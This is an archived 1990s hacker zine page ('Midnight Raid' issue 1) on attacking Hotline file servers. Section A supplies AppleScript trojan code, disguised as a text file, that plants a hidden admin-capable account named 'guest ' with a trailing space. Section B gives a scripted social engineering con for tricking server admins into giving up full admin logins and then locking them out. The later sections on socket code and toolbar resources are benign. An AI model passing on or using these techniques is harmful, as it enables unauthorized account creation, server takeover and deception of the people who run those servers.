home *** CD-ROM | disk | FTP | other *** search

---

/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / zines / Midnight-Raid / MIDNIGHT RAID iss1.docmaker.sit / MIDNIGHT RAID iss1.docmaker.rsrc / TEXT_135.txt

< prev

next >

Wrap

Text File  |  1999-01-28  |  9KB  |  217 lines

---

1. Hotline
2. _____
3.  
4. contents
5. __________
6.       A-Applescript Trojans <lamess...surrounding me...$#@$>
7.         B-Social Engineering
8.         D-The Hotline Socket
9.         E-Making ToolBars
10.  
11. A
12. Trojans are probably the most  boring,  and easy to get caught 
13. may of hacking hotline.  In result,  it is the most popular.  Most are made 
14. up of apple script,  and given a name and an icon <i.e. the icon of a simple 
15. text document and named "my upload list">.  The code of the script is pretty 
16. simple,  and moves a user from the upoads folder into the users folder.
17.  
18. I have written a little bit of code to get you started.
19.  
20. Tell application "finder"
21.             move file "guest " of folder "uploads" of folder "Files" of folder 
22.             "server folder"of folder "Hotline Server"  of startup disk to
23.          folder "Users" of folder "Server folder" of folder "Hotline Server"     
24.             of startup disk
25. End tell
26.  
27. That will put the user data <that you created with "hotline user data editor",  
28. or any one program of that kind,  and uploaded into the uploads folder>,  
29. and move it to the users folder.  That user will be activated.  The reason why 
30. you should call it "guest " is so that when the admin gets info on you,  it will 
31. look like you're a guest <remember you put a space after guest>.
32.  
33. B
34. Social engineering is a lot of fun,  especially when it's with clueless people.  
35. On hotline,  they're easy to find.  When you find your target server <most likely 
36. "Coolhakerz Super-De-Duper MacWarez Filez!!AOL RULES!!">,  change your name and 
37. icon to something different than what you usually use.  Go in,  but be sure not 
38. to message anyone.  Just look around.  Is it a mac server?  who hosts it?  Is it 
39. not as lame as you expected?  how old is it?  Is a full prived admin stupid?  
40. Read the news.  Is it a banner server?  All of those will help you out when 
41. talking to the admin.
42.  
43. Now,  relogin with a new name and icon.  Not the one you had before.  
44. Talk to the admin.This is the typical conversation I have when doing this:
45.  
46. You-"I think I can help out this server."
47. Him-"really?  how???"
48. You-"Your security seems pretty weak.  If I wanted to,  
49.     I could upload a self executable trojan to this server,  and as we speak,  
50.     delete all your files from your hard disk,  or make an admin account."
51. Him-"woa!!...what would you use?"
52. You-"Interware's new file-delete/creation system.  It's pretty new,  but I have 
53.     a bot that can detect it."
54. Him-"Can you u/l it???!"
55. You-"No...it's still in beta.  I will run it off my computer for you,  though.  
56.     I would need an admin account to log it in with..."
57. Him-"Cool!!!l/p??"
58. You-<the l/p of your choice>
59.  
60. <after he completes the account,  say thanks,  then wait.  After about two minutes,
61.     talk to him again:>
62.     
63. You-The bot won't logon because it needs more privs.  It needs a full admin."
64. Him-"oh..ok...sorry.  Hold on"
65.  
66. <if he says no,  and thinks some things up,  do this:
67. You-"I can still run the bot,  but you will have to do on-spot verification"
68. Him-"what's that?"
69. You-"I'll show you"
70. (now login with a new copy of HL Client.  Have a simple Text document with answers 
71. to paste with i.e "Please enter a login and password under your command."  
72. "That was an invalid command".  Tell him to message your "bot" and test him out.  
73. on the first message he sends,  send him back the message "Please enter a login 
74. and password under your command.".  On the second one,  when he sends it,  give 
75. him "That was an invalid command".  If you get it,  don't leave abruptly.  Keep 
76. playing along.  Tell him that you need to work on the bot and will be back in a 
77. while>
78.  
79. <if he does give you the login and pass,  bring on the "bot" (another copy of HL 
80. Client),  and  have a few messages ready to be copy/pasted out of simple text.  
81. Let him play with it a while.  In a few minutes,  quit that copy of HL Client.  
82. Tell him there was an error type one with the bot,  and you need about a half an 
83. hour to go back over the code.>
84.  
85. Both outcomes
86. Go back on in a while with a guest user,  and a new name and icon.  If the admin 
87. is idle or gone,  login with the admin l/p,  and make an account "guest " 
88. <WITH THE SPACE>.  Don't make him red or unkickable,  but all other privs are 
89. there.  If there is another admin there,  login with the admin account/password,  
90. and change your name to the admin's.  Tell him that he needs to leave "your" 
91. server alone,  and delete his account.  Then ban him.  <only do that last part if 
92. ya want to get caught :P>
93.  
94. C
95. The hotline protocol's socket is fairly easily made in RB.  I have supplied some 
96. code for a connect button.  It is all the code you need to make the person 
97. running the HL Server get a "ba-bing" <the hit sound>.  Play with it.
98. All you need is a pushbutton,  an editfield,  and a socket.
99.  
100. if <ip address editfield>.text <> "" then
101.     if inStr(<ip address editfield>.text,":")<> 0 then
102.         <socket's name>.Address = nthField(<ip address editfield>.text,":",1)
103.         <socket's name>.Port = val( nthField(<ip address editfield>.text,":",2) )
104.     else
105.         <socket's name>.Address = <ip address editfield>.text
106.         <socket's name>.Port = 5500
107.     end
108. end
109. <socket's name>.Connect
110.  
111. D
112.  
113. To make a tool bar,  you need to make a new document in resedit.  
114. Make a pict and a HPTB 128 resource.  You need to also open Hotline with 
115. resedit while you have the toolbar open and copy the TMPL resource.  It is easier 
116. to start with a pre-made tool bar,  and customize it to how you want it,  but I 
117. will include the info if you want to start from scratch.
118. <copied from an unnamed text file I found>
119. "HPTB"
120. Set this field to "HPTB".
121.  
122. Version1
123. Set this field to 1.
124.  
125. sideTitleBar
126. If this is set to 1, the titlebar on the toolbar window will appear vertically on 
127. the left side of the window.  If it is set to 0, it will appear at the top as 
128. normal.  A side titlebar is good for a window that is wider than it is high.
129.  
130. toggleWinVis
131. If this is set to 1, the behavior for "showing" a window gets changed.  If the 
132. window is hidden, it is shown in front of all others.  If the window is visible, 
133. it is brought to the front.  If it was already at the front, it gets hidden 
134. (normally it stays visible).
135.  
136. (reserved)
137. It is important that you leave these set to 0.
138.  
139. connectPict
140. The ID of the PICT to draw when Hotline is connected (or 0 for none).
141.  
142. connectPictR
143. The rectangle (top,left,bottom,right) in pixels to draw the "connectPict" at.
144.  
145. height
146. The height of the window in pixels.
147.  
148. width
149. The width of the window in pixels.
150.  
151. bkgndPict
152. The ID of the PICT to draw as the background into the window.  This is the main 
153. picture ‚Äî how the toolbar looks normally.
154.  
155. item bounds
156. The rectangle (top,left,bottom,right) in pixels that encloses this item.  
157. This rectangle is used to determine if the mouse is within the item, and is used 
158. to draw the "mDownPict" in the correct location.
159.  
160. item mDownPict
161. The ID of the PICT to draw while mouse is down in this item (while the button on 
162. the mouse is pressed and located within the bounds of this item).
163.  
164. item mWithinPict
165. The ID of the PICT to draw while mouse is in/over this item (while the mouse is 
166. located within the bounds of this item).
167.  
168. item mDownAction
169. The action to perform when the mouse goes down in this item (when the button on 
170. the mouse is pressed and located within the bounds of this item).    See "Action 
171. Numbers" following for valid values.
172.  
173. item mUpAction
174. The action to perform when the mouse is released in this item (when the button on 
175. the mouse was pressed and has just been released within the bounds of this item). 
176. See "Action Numbers" following for valid values.
177.  
178. item mDownSound
179. When the button on the mouse is pressed over this item, play the sound ("snd ") 
180. of this ID.  Note that if you add your own "snd " resources, the IDs must be in 
181. the range 1000 to 2000.
182.  
183. item mUpSound
184. When the button on the mouse is released over this item, play the sound ("snd ") 
185. of this ID. Note that if you add your own "snd " resources, the IDs must be in 
186. the range 1000 to 2000.
187.  
188. item showPicInWin
189. The ID of the PICT to show in a window with an OK button when this item is 
190. clicked.  Good for credits etc.
191.  
192. mDownPictRct
193. Normally, the "mDownPict" gets drawn in the item bounds.  You can optionally 
194. specify a different rectangle here.
195.  
196. mWithinPictR
197. Normally, the "mWithinPict" gets drawn in the item bounds.  You can optionally 
198. specify a different rectangle here.
199.  
200. Action Numbers
201.  
202. 0   = do nothing
203. 1   = show options window
204. 2   = show connect window
205. 3   = disconnect
206. 4   = show news window
207. 5   = show post window
208. 6   = show chat window
209. 7   = show files window
210. 8   = show user list window
211. 9   = show tasks window
212. 10  = quit
213. 11  = show about window
214. 12  = show new user window
215. 13  = show open user window
216. 15  = show tracker window
217.